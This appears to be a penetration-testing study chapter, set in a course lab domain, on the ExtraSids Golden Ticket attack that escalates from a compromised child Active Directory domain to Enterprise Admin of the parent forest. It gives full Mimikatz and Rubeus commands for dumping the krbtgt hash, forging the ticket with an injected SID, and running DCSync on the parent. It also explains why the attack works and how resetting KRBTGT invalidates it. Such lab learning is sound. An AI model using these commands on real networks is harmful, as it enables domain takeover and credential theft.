Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Attacking Domain Trusts — Child -> Parent (from Windows)

Once a child domain is compromised, the parent domain can be taken over using the ExtraSids attack. This works because SID Filtering is not applied within the same AD forest — the sidHistory attribute is respected across intra-forest trusts.

SID History Primer

The sidHistory attribute preserves a user’s original SID during domain migrations so they can still access resources in the old domain. All SIDs in sidHistory are added to the user’s token at logon.

An attacker can inject the SID of a privileged group (e.g., Enterprise Admins) into sidHistory on an account they control. This grants those privileges without being an actual member of the group.

Implications:

  • DCSync against the parent domain
  • Golden Ticket creation for forest-wide persistence
  • Full administrative access to the entire forest

ExtraSids Attack — Prerequisites

After compromising a child domain, gather:

Data PointHow to Obtain
KRBTGT NT hash (child domain)DCSync the child domain’s KRBTGT account
Child domain SIDGet-DomainSID or Mimikatz DCSync output
Target user nameAny name — does not need to exist
Child domain FQDNKnown from enumeration
Enterprise Admins SID (parent domain)Get-DomainGroup -Domain <PARENT> -Identity "Enterprise Admins"

The Enterprise Admins group SID follows the pattern <parent-domain-SID>-519.

Gathering the Data

1. KRBTGT Hash (Child Domain)

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

Yields the NT hash (e.g., 9d765b482771505cbe97411065964d5f) and child domain SID from the output.

2. Child Domain SID

Get-DomainSID

3. Enterprise Admins SID (Parent Domain)

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

Or with built-in tools:

Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"

ExtraSids Attack — Mimikatz

Create a Golden Ticket in the child domain with an extra SID for Enterprise Admins in the parent domain:

mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
FlagValue
/userAny username (can be fake)
/domainChild domain FQDN
/sidChild domain SID
/krbtgtChild domain KRBTGT NT hash
/sidsEnterprise Admins SID from parent domain
/pttPass-the-ticket (inject into current session)

Verify the ticket is loaded:

klist

Test access to the parent domain DC:

ls \\academy-ea-dc01.inlanefreight.local\c$

ExtraSids Attack — Rubeus

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
FlagValue
/rc4Child domain KRBTGT NT hash
/domainChild domain FQDN
/sidChild domain SID
/sidsEnterprise Admins SID from parent domain
/userAny username (can be fake)
/pttPass-the-ticket

Post-Exploitation: DCSync the Parent Domain

With the Golden Ticket loaded, perform DCSync against the parent domain:

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm

When targeting a domain different from the user’s domain, specify it explicitly:

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

Why This Works

  • Within the same AD forest, sidHistory is respected (no SID Filtering on intra-forest trusts)
  • The Golden Ticket includes the Enterprise Admins SID as an ExtraSID in the PAC
  • The parent domain DC treats the ticket holder as a member of Enterprise Admins
  • Enterprise Admins has administrative access to every domain in the forest

Invalidation

The only way to invalidate Golden Tickets is to change the KRBTGT account password (twice, since AD retains the previous password). This should be done periodically and always after a penetration test where domain compromise was achieved.

Key Takeaways

  • Compromising any child domain in a forest = compromising the entire forest
  • The target user in the Golden Ticket does not need to exist
  • SID Filtering protects against this across external/forest trusts, but not within the same forest
  • Always check for parent-child trust relationships — they are the escalation path from child domain admin to Enterprise Admin